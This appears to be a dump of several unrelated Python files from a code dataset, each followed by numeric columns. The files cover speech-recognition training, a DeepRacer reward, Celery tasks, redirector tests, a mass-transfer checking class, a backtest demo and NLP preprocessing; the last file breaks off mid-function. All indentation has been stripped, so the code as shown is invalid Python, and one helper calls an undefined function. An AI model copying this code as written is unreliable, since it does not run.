cidades = ['Sao Paulo', 'Belo Horizonte', 'Salvador', 'Monte Belo']
estados = ['SP', 'MG', 'BA']
cidades_estados = zip_longest(cidades, estados)
for valor in cidades_estados:
print(valor) | 307 | 117 |
import os
import ast
import torch
import torch.nn as nn
from torch.nn import functional as F
import torch.optim as optim
from torch.utils.data import DataLoader
from pytorch_lightning.core.lightning import LightningModule
from pytorch_lightning import Trainer
from argparse import ArgumentParser
from model import SpeechRecognition
from dataset import Data, collate_fn_padd
from pytorch_lightning.loggers import TensorBoardLogger
from pytorch_lightning.callbacks import ModelCheckpoint
class SpeechModule(LightningModule):
def __init__(self, model, args):
super(SpeechModule, self).__init__()
self.model = model
self.criterion = nn.CTCLoss(blank=28, zero_infinity=True)
self.args = args
def forward(self, x, hidden):
return self.model(x, hidden)
def configure_optimizers(self):
self.optimizer = optim.AdamW(self.model.parameters(), self.args.learning_rate)
self.scheduler = optim.lr_scheduler.ReduceLROnPlateau(
self.optimizer, mode='min',
factor=0.50, patience=6)
return [self.optimizer], [self.scheduler]
def step(self, batch):
spectrograms, labels, input_lengths, label_lengths = batch
bs = spectrograms.shape[0]
hidden = self.model._init_hidden(bs)
hn, c0 = hidden[0].to(self.device), hidden[1].to(self.device)
output, _ = self(spectrograms, (hn, c0))
output = F.log_softmax(output, dim=2)
loss = self.criterion(output, labels, input_lengths, label_lengths)
return loss
def training_step(self, batch, batch_idx):
loss = self.step(batch)
logs = {'loss': loss, 'lr': self.optimizer.param_groups[0]['lr'] }
return {'loss': loss, 'log': logs}
def train_dataloader(self):
d_params = Data.parameters
d_params.update(self.args.dparams_override)
train_dataset = Data(json_path=self.args.train_file, **d_params)
return DataLoader(dataset=train_dataset,
batch_size=self.args.batch_size,
num_workers=self.args.data_workers,
pin_memory=True,
collate_fn=collate_fn_padd)
def validation_step(self, batch, batch_idx):
loss = self.step(batch)
return {'val_loss': loss}
def validation_epoch_end(self, outputs):
avg_loss = torch.stack([x['val_loss'] for x in outputs]).mean()
self.scheduler.step(avg_loss)
tensorboard_logs = {'val_loss': avg_loss}
return {'val_loss': avg_loss, 'log': tensorboard_logs}
def val_dataloader(self):
d_params = Data.parameters
d_params.update(self.args.dparams_override)
test_dataset = Data(json_path=self.args.valid_file, **d_params, valid=True)
return DataLoader(dataset=test_dataset,
batch_size=self.args.batch_size,
num_workers=self.args.data_workers,
collate_fn=collate_fn_padd,
pin_memory=True)
def checkpoint_callback(args):
return ModelCheckpoint(
filepath=args.save_model_path,
save_top_k=True,
verbose=True,
monitor='val_loss',
mode='min',
prefix=''
)
def main(args):
h_params = SpeechRecognition.hyper_parameters
h_params.update(args.hparams_override)
model = SpeechRecognition(**h_params)
if args.load_model_from:
speech_module = SpeechModule.load_from_checkpoint(args.load_model_from, model=model, args=args)
else:
speech_module = SpeechModule(model, args)
logger = TensorBoardLogger(args.logdir, name='speech_recognition')
trainer = Trainer(logger=logger)
trainer = Trainer(
max_epochs=args.epochs, gpus=args.gpus,
num_nodes=args.nodes, distributed_backend=None,
logger=logger, gradient_clip_val=1.0,
val_check_interval=args.valid_every,
checkpoint_callback=checkpoint_callback(args),
resume_from_checkpoint=args.resume_from_checkpoint
)
trainer.fit(speech_module)
if __name__ == "__main__":
parser = ArgumentParser()
# distributed training setup
parser.add_argument('-n', '--nodes', default=1, type=int, help='number of data loading workers')
parser.add_argument('-g', '--gpus', default=1, type=int, help='number of gpus per node')
parser.add_argument('-w', '--data_workers', default=0, type=int,
help='n data loading workers, default 0 = main process only')
parser.add_argument('-db', '--dist_backend', default='ddp', type=str,
help='which distributed backend to use. defaul ddp')
# train and valid
parser.add_argument('--train_file', default=None, required=True, type=str,
help='json file to load training data')
parser.add_argument('--valid_file', default=None, required=True, type=str,
help='json file to load testing data')
parser.add_argument('--valid_every', default=1000, required=False, type=int,
help='valid after every N iteration')
# dir and path for models and logs
parser.add_argument('--save_model_path', default=None, required=True, type=str,
help='path to save model')
parser.add_argument('--load_model_from', default=None, required=False, type=str,
help='path to load a pretrain model to continue training')
parser.add_argument('--resume_from_checkpoint', default=None, required=False, type=str,
help='check path to resume from')
parser.add_argument('--logdir', default='tb_logs', required=False, type=str,
help='path to save logs')
# general
parser.add_argument('--epochs', default=10, type=int, help='number of total epochs to run')
parser.add_argument('--batch_size', default=64, type=int, help='size of batch')
parser.add_argument('--learning_rate', default=1e-3, type=float, help='learning rate')
parser.add_argument('--pct_start', default=0.3, type=float, help='percentage of growth phase in one cycle')
parser.add_argument('--div_factor', default=100, type=int, help='div factor for one cycle')
parser.add_argument("--hparams_override", default="{}", type=str, required=False,
help='override the hyper parameters, should be in form of dict. ie. {"attention_layers": 16 }')
parser.add_argument("--dparams_override", default="{}", type=str, required=False,
help='override the data parameters, should be in form of dict. ie. {"sample_rate": 8000 }')
args = parser.parse_args()
args.hparams_override = ast.literal_eval(args.hparams_override)
args.dparams_override = ast.literal_eval(args.dparams_override)
if args.save_model_path:
if not os.path.isdir(os.path.dirname(args.save_model_path)):
raise Exception("the directory for path {} does not exist".format(args.save_model_path))
main(args) | 7,087 | 2,165 |
"""
AWS DeepRacer reward function using only progress
"""
#===============================================================================
#
# REWARD
#
#===============================================================================
def reward_function(params):
# Skipping the explanation and verbose math here...
baseline = 102
motivator = -1
distance_to_goal = 100.0 - params['progress']
reward = baseline + \
motivator + \
-distance_to_goal
# 1e-8 is a crash so we ALWAYS need to be higher than that
return float(max(reward, 1e-3))
| 596 | 164 |
from __future__ import absolute_import, unicode_literals
from hashlib import sha1
from time import sleep
from celery import shared_task
from .models import JPEGFile
@shared_task
def calculate_etag(pk):
jpeg = JPEGFile.objects.get(pk=pk)
jpeg.etag = sha1(jpeg.file.read()).hexdigest()
sleep(5)
jpeg.save()
@shared_task(bind=True)
def forced_failure(self):
raise Exception('forced failure')
@shared_task(bind=True, max_retries=None)
def retry_forever(self):
self.retry(countdown=5)
@shared_task(bind=True)
def sleep_for_success(self):
sleep(5)
| 579 | 218 |
# coding=utf-8
"""
Redirector tests
"""
from redirector import views
def test_redirects_correctly(client):
response = client.get('/foo/bar.html?foo=bar')
assert response.status_code == 301
assert response.headers['Location'] == 'https://www.example.com/foo/bar.html?foo=bar'
def test_normalize_port_normalizes_properly():
assert views.normalize_port('http', 80) == None
assert views.normalize_port('https', 443) == None
assert views.normalize_port('http', 8080) == 8080
assert views.normalize_port('http', '8080') == 8080
def test_make_base_url_with_root_base_path():
scheme = 'https'
host = 'foo.bar'
port = 80
base_path = '/'
assert views.make_base_url(scheme, host, port, base_path) == 'https://foo.bar:80/'
def test_make_base_url_with_non_root_base_path():
scheme = 'https'
host = 'foo.bar'
port = 80
base_path = '/fooooooooo/'
assert views.make_base_url(scheme, host, port, base_path) == 'https://foo.bar:80/fooooooooo/'
def test_make_redirect_url_with_root():
scheme = 'https'
host = 'foo.bar'
port = 80
base_path = '/aye/aye/captain/'
path = ''
expected = 'https://foo.bar:80/aye/aye/captain/'
assert views.make_redirect_url(path, scheme, host, port, base_path) == expected
def test_make_redirect_url_with_root_base_path():
scheme = 'https'
host = 'foo.bar'
port = 80
base_path = '/'
path = 'aye/aye/captain?jump_overboard=true&depth=199'
expected = 'https://foo.bar:80/aye/aye/captain?jump_overboard=true&depth=199'
assert views.make_redirect_url(path, scheme, host, port, base_path) == expected
def test_make_redirect_url_with_non_root_base_path():
scheme = 'https'
host = 'foo.bar'
port = 80
base_path = '/fooooooooo/'
path = 'aye/aye/captain?jump_overboard=true&depth=199'
expected = 'https://foo.bar:80/fooooooooo/aye/aye/captain?jump_overboard=true&depth=199'
assert views.make_redirect_url(path, scheme, host, port, base_path) == expected
| 2,028 | 782 |
"""multipy: Python library for multicomponent mass transfer"""
__author__ = "James C. Sutherland, Kamila Zdybal"
__copyright__ = "Copyright (c) 2022, James C. Sutherland, Kamila Zdybal"
__license__ = "MIT"
__version__ = "1.0.0"
__maintainer__ = ["Kamila Zdybal"]
__email__ = ["kamilazdybal@gmail.com"]
__status__ = "Production"
import numpy as np
import pandas as pd
import random
import copy
import scipy
import multipy
import warnings
gas_constant = 8.31446261815324
################################################################################
################################################################################
####
#### Class: Check
####
################################################################################
################################################################################
class Check:
"""
Supports performing basic checks of the computed quantities.
"""
# --------------------------------------------------------------------------
def __init__(self):
pass
# --------------------------------------------------------------------------
def sum_of_species_fractions(self, species_fractions, tolerance=1e-12, verbose=False):
"""
Checks if all species mole/mass/volume fractions sum to 1.0 for
every observation within a specified tolerance.
For mole fractions:
.. math::
\\sum_{i=1}^{n} X_i = 1.0
For mass fractions:
.. math::
\\sum_{i=1}^{n} Y_i = 1.0
For volume fractions:
.. math::
\\sum_{i=1}^{n} V_i = 1.0
where :math:`n` is the number of species.
:param species_fractions:
scalar ``numpy.ndarray`` specifying **all** species mole/mass/volume fractions in :math:`[-]`.
It should be of size ``(n_species, n_observations)`` where
``n_species`` is at least 2.
:param tolerance: (optional)
``float`` specifying the tolerance. It should be larger than 0.0 and
smaller than 1.0.
:param verbose: (optional)
``bool`` for printing verbose information.
:return:
- **idx** - indices of observations where species mole/mass/volume fractions do not sum to 1.0 within a specified tolerance.
"""
if not isinstance(species_fractions, np.ndarray):
raise ValueError("Parameter `species_fractions` has to be of type `numpy.ndarray`.")
try:
(n_species, n_observations) = np.shape(species_fractions)
except:
raise ValueError("Parameter `species_fractions` has to be a matrix.")
if n_species < 2:
raise ValueError("Species fractions matrix `species_mole_fractions` has to have at least two species.")
if n_observations < n_species:
warnings.warn("Number of observations in `species_fractions` is smaller than the number of species. Make sure that the `species_fractions` has shape `(n_observations,n_species)`.")
if not isinstance(tolerance, float):
raise ValueError("Parameter `tolerance` has to be of type `float`.")
if tolerance <= 0 or tolerance >= 1:
raise ValueError("Parameter `tolerance` has to be larger than 0 and smaller than 1.")
if not isinstance(verbose, bool):
raise ValueError("Parameter `verbose` has to be of type `bool`.")
sums = np.sum(species_fractions, axis=0)
sums_boolean = np.zeros_like(sums)
for i, observation in enumerate(sums):
if (observation < 1+tolerance) and (observation > 1-tolerance):
sums_boolean[i] = True
else:
sums_boolean[i] = False
if sums_boolean.all():
if verbose: print('All mole/mass/volume fractions sum to 1.0 within a specified tolerance.')
idx = np.array([])
else:
if verbose: print('Detected observations where mole/mass/volume fractions do not sum to 1.0 within a specified tolerance.')
(idx, ) = np.where(sums_boolean==False)
return idx
# --------------------------------------------------------------------------
def range_of_species_fractions(self, species_fractions, tolerance=1e-12, verbose=False):
"""
Checks if all species mole/mass/volume fraction values are bounded between
0 and 1.
For mole fractions:
.. math::
X_i \\in \\langle 0, 1 \\rangle
For mass fractions:
.. math::
Y_i \\in \\langle 0, 1 \\rangle
For volume fractions:
.. math::
V_i \\in \\langle 0, 1 \\rangle
:param species_fractions:
scalar ``numpy.ndarray`` specifying **all** species mole/mass/volume fractions in :math:`[-]`.
It should be of size ``(n_observations,n_species)`` where
``n_species`` is at least 2.
:param verbose: (optional)
``bool`` for printing verbose information.
:return:
- **idx_below_zero** - indices of observations where species mole/mass/volume fractions are less than 0.0 within a specified tolerance.
- **idx_above_one** - indices of observations where species mole/mass/volume fractions are larger than 1.0 within a specified tolerance.
"""
if not isinstance(species_fractions, np.ndarray):
raise ValueError("Parameter `species_fractions` has to be of type `numpy.ndarray`.")
try:
(n_species, n_observations) = np.shape(species_fractions)
except:
raise ValueError("Parameter `species_fractions` has to be a matrix.")
if n_species < 2:
raise ValueError("Mole fractions matrix `species_fractions` has to have at least two species.")
if n_observations < n_species:
warnings.warn("Number of observations in `species_fractions` is smaller than the number of species. Make sure that the `species_fractions` has shape `(n_observations,n_species)`.")
if not isinstance(verbose, bool):
raise ValueError("Parameter `verbose` has to be of type `bool`.")
if not np.greater_equal(species_fractions, 0-tolerance).all():
if verbose: print('Not all mole/mass/volume fractions are larger than 0.0 within a specified tolerance.')
(idx_below_zero_i, idx_below_zero_j) = np.where(species_fractions<(0-tolerance))
idx_below_zero = np.hstack((idx_below_zero_i[:,None], idx_below_zero_j[:,None]))
else:
if verbose: print('All mole/mass/volume fractions are larger than 0.0 within a specified tolerance.')
idx_below_zero = np.array([])
if not np.less_equal(species_fractions, 1+tolerance).all():
if verbose: print('Not all mole/mass/volume fractions are smaller than 1.0 within a specified tolerance.')
(idx_above_one_i, idx_above_one_j) = np.where(species_fractions>(1+tolerance))
idx_above_one = np.hstack((idx_above_one_i[:,None], idx_above_one_j[:,None]))
else:
if verbose: print('All mole/mass/volume fractions are smaller than 1.0 within a specified tolerance.')
idx_above_one = np.array([])
return (idx_below_zero, idx_above_one)
# --------------------------------------------------------------------------
def sum_of_species_gradients(self, species_gradients, tolerance=1e-12, verbose=False):
"""
Checks if all species mole/mass/volume fraction gradients sum to 0.0 for
every observation within a specified tolerance.
For mole fractions:
.. math::
\\sum_{i=1}^{n} \\nabla X_i = 0.0
For mass fractions:
.. math::
\\sum_{i=1}^{n} \\nabla Y_i = 0.0
For volume fractions:
.. math::
\\sum_{i=1}^{n} \\nabla V_i = 0.0
where :math:`n` is the number of species.
:param species_gradients:
scalar ``numpy.ndarray`` specifying **all** species mole/mass/volume fraction gradients in :math:`[-]`.
It should be of size ``(n_species, n_observations)`` where
``n_species`` is at least 2.
:param tolerance: (optional)
``float`` specifying the tolerance. It should be larger than 0.0 and
smaller than 1.0.
:param verbose: (optional)
``bool`` for printing verbose information.
:return:
- **idx** - indices of observations where species mole/mass/volume fraction gradients do not sum to 0.0 within a specified tolerance.
"""
if not isinstance(species_gradients, np.ndarray):
raise ValueError("Parameter `species_gradients` has to be of type `numpy.ndarray`.")
try:
(n_species, n_observations) = np.shape(species_gradients)
except:
raise ValueError("Parameter `species_gradients` has to be a matrix.")
if n_species < 2:
raise ValueError("Species fractions matrix `species_gradients` has to have at least two species.")
if n_observations < n_species:
warnings.warn("Number of observations in `species_gradients` is smaller than the number of species. Make sure that the `species_fractions` has shape `(n_observations,n_species)`.")
if not isinstance(tolerance, float):
raise ValueError("Parameter `tolerance` has to be of type `float`.")
if tolerance <= 0 or tolerance >= 1:
raise ValueError("Parameter `tolerance` has to be larger than 0 and smaller than 1.")
if not isinstance(verbose, bool):
raise ValueError("Parameter `verbose` has to be of type `bool`.")
sums = np.sum(species_gradients, axis=0)
sums_boolean = np.zeros_like(sums)
for i, observation in enumerate(sums):
if (observation < tolerance) and (observation > -tolerance):
sums_boolean[i] = True
else:
sums_boolean[i] = False
if sums_boolean.all():
if verbose: print('All mole/mass/volume fraction gradiens sum to 0.0 within a specified tolerance.')
idx = np.array([])
else:
if verbose: print('Detected observations where mole/mass/volume fraction gradients do not sum to 0.0 within a specified tolerance.')
(idx, ) = np.where(sums_boolean==False)
return idx
# --------------------------------------------------------------------------
def sum_of_species_production_rates(self, species_production_rates, tolerance=1e-12, verbose=False):
"""
Checks if all species production rates sum to 0.0 for
every observation within a specified tolerance:
For net molar production rates:
.. math::
\\sum_{i=1}^{n} s_i = 0.0
For net mass production rates:
.. math::
\\sum_{i=1}^{n} \\omega_i = 0.0
where :math:`n` is the number of species.
:param species_production_rates:
scalar ``numpy.ndarray`` specifying **all** species production rates, :math:`s_i` in :math:`mole/(m^3s)` or :math:`\\omega_i` in :math:`kg/(m^3s)`.
It should be of size ``(n_species,n_observations)`` where
``n_species`` is at least 2.
:param tolerance: (optional)
``float`` specifying the tolerance. It should be larger than 0.0 and
smaller than 1.0.
:param verbose: (optional)
``bool`` for printing verbose information.
:return:
- **idx** - indices of observations where species source terms do not sum to 0.0 within a specified tolerance.
"""
if not isinstance(species_production_rates, np.ndarray):
raise ValueError("Parameter `species_production_rates` has to be of type `numpy.ndarray`.")
try:
(n_species, n_observations) = np.shape(species_production_rates)
except:
raise ValueError("Parameter `species_production_rates` has to be a matrix.")
if n_species < 2:
raise ValueError("Species source terms matrix `species_production_rates` has to have at least two species.")
if n_observations < n_species:
warnings.warn("Number of observations in `species_production_rates` is smaller than the number of species. Make sure that the `species_production_rates` has shape `(n_observations,n_species)`.")
if not isinstance(tolerance, float):
raise ValueError("Parameter `tolerance` has to be of type `float`.")
if tolerance <= 0 or tolerance >= 1:
raise ValueError("Parameter `tolerance` has to be larger than 0 and smaller than 1.")
if not isinstance(verbose, bool):
raise ValueError("Parameter `verbose` has to be of type `bool`.")
sums = np.sum(species_production_rates, axis=0)
sums_boolean = np.zeros_like(sums)
for i, observation in enumerate(sums):
if (observation < tolerance) and (observation > -tolerance):
sums_boolean[i] = True
else:
sums_boolean[i] = False
if sums_boolean.all():
if verbose: print('All species production rates sum to 0.0 within a specified tolerance.')
idx = np.array([])
else:
if verbose: print('Detected observations where species production rates do not sum to 0.0 within a specified tolerance.')
(idx, ) = np.where(sums_boolean==False)
return idx
# --------------------------------------------------------------------------
| 13,715 | 3,801 |
import numpy as np
import pandas as pd
from backtesting.analysis import plot_cost_proceeds, plot_holdings, \
plot_performance
from backtesting.report import Report
from backtesting.simulation import simulate
def main() -> None:
from string import ascii_uppercase
np.random.seed(42)
markets = list(ascii_uppercase[:5])
m = len(markets)
n = 86400
fee = 0.0001
expiration = 10
times = pd.date_range('2000-01-01', freq='S', periods=n)
bf_ = (1 - np.random.rand(n, m) ** (1 / 30))
buy_fraction = pd.DataFrame(bf_, index=times, columns=markets)
sf_ = 1 - (1 - np.random.rand(n, m)) ** (1 / 300)
sell_fraction = pd.DataFrame(sf_, index=times, columns=markets)
_prices = np.random.lognormal(1e-7, 1e-4, size=(n, m)).cumprod(axis=0)
price = pd.DataFrame(_prices, index=times, columns=markets)
drop = np.random.permutation(np.arange(price.size).reshape(*price.shape))
price[drop % 7 == 0] = np.nan
_report = simulate(100_000., buy_fraction, sell_fraction, price, fee,
expiration, expiration, single_trade=True)
plot_holdings(_report)
import matplotlib.pyplot as plt
plt.show()
if __name__ == '__main__':
main()
__all__ = ['simulate', 'plot_holdings', 'plot_cost_proceeds',
'plot_performance']
| 1,311 | 491 |
'''
Author: Geeticka Chauhan
Performs pre-processing on a csv file independent of the dataset (once converters have been applied).
Refer to notebooks/Data-Preprocessing for more details. The methods are specifically used in the non
_original notebooks for all datasets.
'''
import os, pandas as pd, numpy as np
import nltk
import spacy
from spacy.tokens import Doc
# important global variables for identifying the location of entities
entity1 = 'E'
entity2 = 'EOTHER'
entity_either = 'EEITHER'
'''
The methods below are for the preprocessing type 1
'''
# separate the indexes of entity 1 and entity 2 by what is intersecting
# and what is not
def get_common_and_separate_entities(e1_indexes, e2_indexes):
e1_indexes = set(e1_indexes)
e2_indexes = set(e2_indexes)
common_indexes = e1_indexes.intersection(e2_indexes)
only_e1_indexes = list(e1_indexes.difference(common_indexes))
only_e2_indexes = list(e2_indexes.difference(common_indexes))
return only_e1_indexes, only_e2_indexes, list(common_indexes)
# given an entity replacement dictionary like {'0:0': 'entity1'}
# provide more information related to the location of the entity
def entity_replacement_dict_with_entity_location(entity_replacement_dict,
only_e1_indexes, only_e2_indexes, common_indexes):
def update_dict_with_indexes(new_entity_replacement_dict, only_indexes, start, end):
for i in only_indexes:
key = str(i[0]) + ':' + str(i[-1])
new_entity_replacement_dict[key]['start'] = start
new_entity_replacement_dict[key]['end'] = end
return new_entity_replacement_dict
new_entity_replacement_dict = {}
# below is just for initialization purposes, when start and end is none, means we are not
# inserting anything before or after those words in the sentence
for key in entity_replacement_dict.keys():
new_entity_replacement_dict[key] = {'replace_by': entity_replacement_dict[key],
'start': None, 'end': None}
new_entity_replacement_dict = update_dict_with_indexes(new_entity_replacement_dict, only_e1_indexes,
entity1 + 'START', entity1 + 'END')
new_entity_replacement_dict = update_dict_with_indexes(new_entity_replacement_dict, only_e2_indexes,
entity2 + 'START', entity2 + 'END')
new_entity_replacement_dict = update_dict_with_indexes(new_entity_replacement_dict, common_indexes,
entity_either + 'START', entity_either + 'END')
return new_entity_replacement_dict
###
### Helper functions
###
#given string 12:30, return 12, 30 as a tuple of ints
def parse_position(position):
positions = position.split(':')
return int(positions[0]), int(positions[1])
def sort_position_keys(entity_replacement_dict):
positions = list(entity_replacement_dict.keys())
sorted_positions = sorted(positions, key=lambda x: int(x.split(':')[0]))
return sorted_positions
# remove any additional whitespace within a line
def remove_whitespace(line):
return str(" ".join(line.split()).strip())
def list_to_string(sentence):
return " ".join(sentence)
# adapted from tag_sentence method in converter_ddi
# note that white spaces are added in the new sentence on purpose
def replace_with_concept(row):
sentence = row.tokenized_sentence.split()
e1_indexes = row.metadata['e1']['word_index']
e2_indexes = row.metadata['e2']['word_index'] # assuming that within the same entity indexes, no overlap
new_sentence = ''
only_e1_indexes, only_e2_indexes, common_indexes = \
get_common_and_separate_entities(e1_indexes, e2_indexes)
entity_replacement_dict = row.metadata['entity_replacement'] # assuming no overlaps in replacement
new_entity_replacement_dict = entity_replacement_dict_with_entity_location(entity_replacement_dict,
only_e1_indexes, only_e2_indexes,
common_indexes)
repl_dict = new_entity_replacement_dict # just using proxy because names are long
sorted_positions = sort_position_keys(new_entity_replacement_dict)
for i in range(len(sorted_positions)):
curr_pos = sorted_positions[i]
curr_start_pos, curr_end_pos = parse_position(curr_pos)
start_replace = '' if repl_dict[curr_pos]['start'] is None else repl_dict[curr_pos]['start'].upper()
end_replace = '' if repl_dict[curr_pos]['end'] is None else repl_dict[curr_pos]['end'].upper()
between_replace = repl_dict[curr_pos]['replace_by'].upper() # between the entity replacement
if i == 0:
new_sentence += list_to_string(sentence[:curr_start_pos]) + ' ' + start_replace + ' ' + \
between_replace + ' ' + end_replace + ' '
else:
prev_pos = sorted_positions[i-1]
_, prev_end_pos = parse_position(prev_pos)
middle = list_to_string(sentence[prev_end_pos+1 : curr_start_pos]) # refers to middle between prev segment and the
# current segment
if middle == '':
middle = ' '
new_sentence += middle + ' ' + start_replace + ' ' + between_replace + ' ' + end_replace + ' '
if i == len(sorted_positions) - 1 and curr_end_pos < len(sentence) - 1:
new_sentence += ' ' + list_to_string(sentence[curr_end_pos+1:])
new_sentence = remove_whitespace(new_sentence)
return new_sentence
'''
Preprocessing Type 2: Removal of stop words, punctuations and the replacement of digits
'''
# gives a dictionary signifying the location of the different entities in the sentence
def get_entity_location_dict(only_e1_indexes, only_e2_indexes, common_indexes):
entity_location_dict = {}
def update_dict_with_indexes(entity_location_dict, only_indexes, start, end):
for i in only_indexes:
key = str(i[0]) + ':' + str(i[-1])
entity_location_dict[key] = {'start': start, 'end': end}
return entity_location_dict
entity_location_dict = update_dict_with_indexes(entity_location_dict, only_e1_indexes,
entity1 + 'START', entity1 + 'END')
entity_location_dict = update_dict_with_indexes(entity_location_dict, only_e2_indexes,
entity2 + 'START', entity2 + 'END')
entity_location_dict = update_dict_with_indexes(entity_location_dict, common_indexes,
entity_either + 'START', entity_either + 'END')
return entity_location_dict
# given the index information of the entities, return the sentence with
# tags ESTART EEND etc to signify the location of the entities
def get_new_sentence_with_entity_replacement(sentence, e1_indexes, e2_indexes):
new_sentence = ''
only_e1_indexes, only_e2_indexes, common_indexes = \
get_common_and_separate_entities(e1_indexes, e2_indexes)
entity_loc_dict = get_entity_location_dict(only_e1_indexes, only_e2_indexes, common_indexes)
sorted_positions = sort_position_keys(entity_loc_dict)
for i in range(len(sorted_positions)):
curr_pos = sorted_positions[i]
curr_start_pos, curr_end_pos = parse_position(curr_pos)
start_replace = entity_loc_dict[curr_pos]['start']
end_replace = entity_loc_dict[curr_pos]['end']
if i == 0:
new_sentence += list_to_string(sentence[:curr_start_pos]) + ' ' + start_replace + ' ' + \
list_to_string(sentence[curr_start_pos : curr_end_pos + 1]) + ' ' + end_replace + ' '
else:
prev_pos = sorted_positions[i-1]
_, prev_end_pos = parse_position(prev_pos)
middle = list_to_string(sentence[prev_end_pos+1 : curr_start_pos])
if middle == '':
middle = ' '
new_sentence += middle + ' ' + start_replace + ' ' + \
list_to_string(sentence[curr_start_pos: curr_end_pos+1]) + ' ' + end_replace + ' '
if i == len(sorted_positions) - 1 and curr_end_pos < len(sentence) - 1:
new_sentence += ' ' + list_to_string(sentence[curr_end_pos+1:])
new_sentence = remove_whitespace(new_sentence)
# TODO write some code to do the replacement
return new_sentence
# preprocessing 2: remove the stop words and punctuation from the data
# and replace all digits
# TODO: might be nice to give an option to specify whether to remove the stop words or not
# this is a low priority part though
def replace_digit_punctuation_stop_word(row, stop_word_removal=True):
nlp = spacy.load('en_core_web_lg')
sentence = row.tokenized_sentence.split()
e1_indexes = row.metadata['e1']['word_index']
e2_indexes = row.metadata['e2']['word_index']
sentence = get_new_sentence_with_entity_replacement(sentence, e1_indexes, e2_indexes)
# detection of stop words, punctuations and digits
index_to_keep_dict = {} # index: {keep that token or not, replace_with}
tokenizedSentence = sentence.lower().split()
doc = Doc(nlp.vocab, words=tokenizedSentence)
nlp.tagger(doc)
nlp.parser(doc)
for token in doc:
word_index = token.i
stop_word = token.is_stop
punct = token.is_punct
num = token.like_num
if (stop_word_removal and (stop_word or punct)) or (not stop_word_removal and punct):
index_to_keep_dict[word_index] = {'keep': False, 'replace_with': None}
elif num:
index_to_keep_dict[word_index] = {'keep': True, 'replace_with': 'NUMBER'}
else:
index_to_keep_dict[word_index] = {'keep': True, 'replace_with': None}
# generation of the new sentence based on the above findings
sentence = sentence.split()
new_sentence = []
for i in range(len(sentence)):
word = sentence[i]
if word.endswith('END') or word.endswith('START'):
new_sentence.append(word)
continue
if not index_to_keep_dict[i]['keep']:
continue # don't append when it is a stop word or punctuation
if index_to_keep_dict[i]['replace_with'] is not None:
new_sentence.append(index_to_keep_dict[i]['replace_with'])
continue
new_sentence.append(word)
return list_to_string(new_sentence)
'''
Preprocessing Type 3 part 1: NER
'''
# a method to check for overlap between the ner_dict that is created
def check_for_overlap(ner_dict):
def expand_key(string): # a string that looks like '2:2' to [2]
start = int(string.split(':')[0])
end = int(string.split(':')[1])
return list(range(start, end+1))
expanded_keys = [expand_key(key) for key in ner_dict.keys()]
for i1, item in enumerate(expanded_keys):
for i2 in range(i1 + 1, len(expanded_keys)):
if set(item).intersection(expanded_keys[i2]):
return True # overlap is true
for i2 in range(0, i1):
if set(item).intersection(expanded_keys[i2]):
return True
return False
###
### Helper functions for the NER replacement
###
def overlap_index(index1, index2):
def expand(index):
start = int(index[0])
end = int(index[1])
return list(range(start, end+1))
expand_index1 = expand(index1)
expand_index2 = expand(index2)
if set(expand_index1).intersection(set(expand_index2)):
return True
else: return False
# for indexes that look like (1,1) and (2,2) check if the left is fully included in the right
def fully_included(index1, index2):
if int(index1[0]) >= int(index2[0]) and int(index1[1]) <= int(index2[1]): return True
else: return False
def beginning_overlap(index1, index2): # this is tricky when (1,1) and (2,2) are there
if int(index1[0]) < int(index2[0]) and int(index1[1]) <= int(index2[1]): return True
else: return False
def end_overlap(index1, index2): # this is tricky
if int(index1[0]) >= int(index2[0]) and int(index1[1]) > int(index2[1]): return True
else: return False
def beginning_and_end_overlap(index1, index2):
if int(index1[0]) < int(index2[0]) and int(index1[1]) > int(index2[1]): return True
else:
return False
#else there is no overlap
# taken from https://stackoverflow.com/questions/46548902/converting-elements-of-list-of-nested-lists-from-string-to-integer-in-python
def list_to_int(lists):
return [int(el) if not isinstance(el,list) else convert_to_int(el) for el in lists]
def correct_entity_indexes_with_ner(ner_dict, e_index):
new_e_index = []
for i in range(len(e_index)): # we are reading tuples here
for key in ner_dict.keys():
indexes = e_index[i]
index2 = indexes
index1 = parse_position(key) # checking if ner is fully included etc
if not overlap_index(index1, index2): # don't do below if there is no overlap
continue
if beginning_overlap(index1, index2):
e_index[i] = (index1[0], e_index[i][1])
elif end_overlap(index1, index2):
e_index[i] = (e_index[i][0], index1[1])
elif beginning_and_end_overlap(index1, index2):
e_index[i] = (index1[0], index1[1]) # else you don't change or do anything
return e_index
# given all of these dictionaries, return the ner replacement dictionary
def get_ner_replacement_dictionary(only_e1_index, only_e2_index, common_indexes, ner_dict):
def update_dict_with_entity(e_index, ner_repl_dict, entity_name):
for indexes in e_index:
key1 = str(indexes[0]) + ':' + str(indexes[0]) + ':' + entity_name + 'START'
ner_repl_dict[key1] = {'replace_by': None, 'insert': entity_name + 'START'}
key2 = str(int(indexes[-1]) + 1) + ':' + str(int(indexes[-1]) + 1) + ':' + entity_name + 'END'
ner_repl_dict[key2] = {'replace_by': None, 'insert': entity_name + 'END'}
return ner_repl_dict
# we are going to do something different: only spans for NER will be counted, but
# for the ENTITYSTART and ENTITYEND, we will keep the span as what token to insert before
ner_repl_dict = {}
for key in ner_dict:
ner_repl_dict[key] = {'replace_by': ner_dict[key], 'insert': None}
ner_repl_dict = update_dict_with_entity(only_e1_index, ner_repl_dict, entity1)
ner_repl_dict = update_dict_with_entity(only_e2_index, ner_repl_dict, entity2)
ner_repl_dict = update_dict_with_entity(common_indexes, ner_repl_dict, entity_either)
return ner_repl_dict
# this function is different from the sort_position_keys because
# we care about sorting not just by the beginning token, but also by the length that the span contains
def ner_sort_position_keys(ner_repl_dict): # this can potentially replace sort_position_keys
# but only if the application of this function does not change the preprocessed CSVs generated
def len_key(key):
pos = parse_position(key)
return pos[1] - pos[0] + 1
def start_or_end(key):
# handle the case where the ending tag of the entity is in the same place as the
#starting tag of another entity - this happens when two entities are next to each other
if len(key.split(':')) <= 2: # means that this is a named entity
return 3
start_or_end = key.split(':')[2]
if start_or_end.endswith('END'): # ending spans should get priority
return 1
elif start_or_end.endswith('START'):
return 2
positions = list(ner_repl_dict.keys())
sorted_positions = sorted(positions, key=lambda x: (parse_position(x)[0], len_key(x), start_or_end(x)))
return sorted_positions
# given a splitted sentence - make sure that the sentence is in list form
def get_ner_dict(sentence, nlp):
#nlp = spacy.load(spacy_model_name)
tokenizedSentence = sentence # in this case lowercasing is not helpful
doc = Doc(nlp.vocab, words=tokenizedSentence)
nlp.tagger(doc)
nlp.parser(doc)
nlp.entity(doc) # run NER
ner_dict = {} # first test for overlaps within ner
for ent in doc.ents:
